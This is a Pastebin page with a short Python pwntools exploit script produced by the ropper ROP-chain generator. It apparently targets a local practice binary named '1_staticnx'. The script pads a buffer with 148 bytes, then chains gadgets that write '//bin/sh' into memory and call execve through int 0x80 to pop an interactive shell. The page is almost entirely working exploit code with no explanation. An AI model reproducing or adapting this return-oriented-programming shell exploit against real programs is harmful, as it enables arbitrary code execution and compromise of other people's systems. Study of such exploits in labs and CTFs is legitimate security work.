Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Generated by ropper ropchain generator #
- from pwn import *
- from struct import pack
- p = lambda x : pack('I', x)
- IMAGE_BASE_0 = 0x08048000 # ../Downloads/1_staticnx
- rebase_0 = lambda x : p(x + IMAGE_BASE_0)
- rop = 'A' * 148
- rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
- rop += '//bi'
- rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
- rop += rebase_0(0x000a7060)
- rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
- rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
- rop += 'n/sh'
- rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
- rop += rebase_0(0x000a7064)
- rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
- rop += rebase_0(0x000013e3) # 0x080493e3: xor eax, eax; ret;
- rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
- rop += rebase_0(0x000a7068)
- rop += rebase_0(0x0000c95b) # 0x0805495b: mov dword ptr [edx], eax; ret;
- rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret;
- rop += rebase_0(0x000a7060)
- rop += rebase_0(0x0009afc9) # 0x080e2fc9: pop ecx; ret;
- rop += rebase_0(0x000a7068)
- rop += rebase_0(0x0002a99a) # 0x0807299a: pop edx; ret;
- rop += rebase_0(0x000a7068)
- rop += rebase_0(0x00073b46) # 0x080bbb46: pop eax; ret;
- rop += p(0xfffffff5)
- rop += rebase_0(0x00019a07) # 0x08061a07: neg eax; ret;
- rop += rebase_0(0x0002afa0) # 0x08072fa0: int 0x80; ret;
- def main():
- p = process('../Downloads/1_staticnx')
- p.send(rop)
- p.interactive()
- if __name__ == '__main__':
- main()
Add Comment
Please, Sign In to add comment
